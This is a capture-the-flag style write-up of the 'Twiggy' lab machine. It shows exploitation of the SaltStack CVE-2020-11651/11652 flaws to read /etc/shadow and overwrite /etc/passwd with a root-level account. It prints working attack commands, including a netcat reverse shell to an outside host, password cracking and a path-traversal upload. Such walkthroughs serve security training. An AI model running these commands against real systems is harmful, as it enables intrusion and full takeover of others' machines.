Twiggy

Source: Proving Grounds OS: Linux Community Rating: Intermediate

Enumeration & Reconnaissance

• I started with autorecon as usual and found the following open ports:

  • SSH (22)

  • DNS (53)

  • HTTP (80)

  • 4505 & 4506

  • HTTP (8000)

Service Analysis

• I began with the HTTP servers. The first one on port 80 hosted an application named Mezzanine with an admin login panel, a promising target. I tried multiple credentials (admin:admin, admin:password, etc.) but none worked. I checked online for the default password (admin:default) but that didn’t work either. I also looked for CVEs, but nothing surfaced.

Mezzanine

Admin Login Portal

• Next, I moved to HTTP (8000), which exposed what appeared to be API endpoints. I interacted with them but only received 404 responses showing "CherryPy 5.6.0". The only CVE I found there was related to XSS, which wasn’t useful at the moment.

HTTP (8000)

CherryPy 5.6.0

• Stuck, I went back to the remaining ports: 4505 and 4506. Nmap didn’t recognize these ports clearly, the scan output only displayed "ZeroMQ ZMTP 2.0".

ZeroMQ ZMTP 2.0

Gaining Initial Access

• Searching for vulnerabilities, I found CVE-2020-11652 & CVE-2020-11651 (Saltstack 3000.1 vulnerabilities) which provide RCE, the HTTP 8000 responses included a header hinting at Saltstack.

Salt-API/3000-1

• I downloaded the PoC and had to install several modules first for it to work:

python -m venv .venv
source .venv/bin/activate
pip install salt
pip install pyyaml
pip install looseversion
pip install packaging
pip install tornado
pip install msgpack
pip install distro
pip install jinja2
pip install zmq

• I attempted to get RCE using the PoC with:

python exploit.py --master 192.168.197.62 --exec "nc 192.168.45.201 8000 -e /bin/sh"

• That attempt to execute arbitrary commands didn’t work. I then tried to read files instead, and that worked:

python exploit.py --master 192.168.197.62 -r /etc/passwd

• I managed to read both /etc/passwd and /etc/shadow. I attempted to crack the root password, but that didn’t yield results.

unshadow passwd shadow
john --wordlist=/usr/share/wordlists/rockyou.txt hash

Can't Crack

• Noticing an upload feature in the exploit, I considered replacing the passwd file. I tested with a random file to a random directory and it failed, out of desperation I still tried to replace the /etc/passwd file itself.

• I added a new user, pwned, by generating a password hash with:

openssl passwd pwned

• Then I appended the following line to the passwd file to create a root-level account:

pwned:$1$D/X2r2oc$ECKG4TeHHXumj2tUrYxaA/:0:0:root:/root:/bin/bash

New passwd File

• After appending it, I uploaded the modified passwd file back to the target.

python exploit.py --master 192.168.197.62 --upload-src passwd --upload-dest ../../../../../../etc/passwd
python exploit.py --master 192.168.197.62 -r /etc/passwd

• Crossed fingers, I retrieved the file, and sure enough, the new user was appended. I then SSHed into the target and that worked. I was in as root!

SSH as pwned

Lessons Learned

• When standard web authentication bypasses fail, exploring less obvious ports and services (like the ZeroMQ ports) can reveal alternative attack vectors.

• Using error-based or file read vulnerabilities to dump critical system files (e.g., /etc/passwd and /etc/shadow) can be a viable path to gaining initial access.

• If direct cracking of the root password fails, consider creative methods such as replacing the passwd file to add a new user.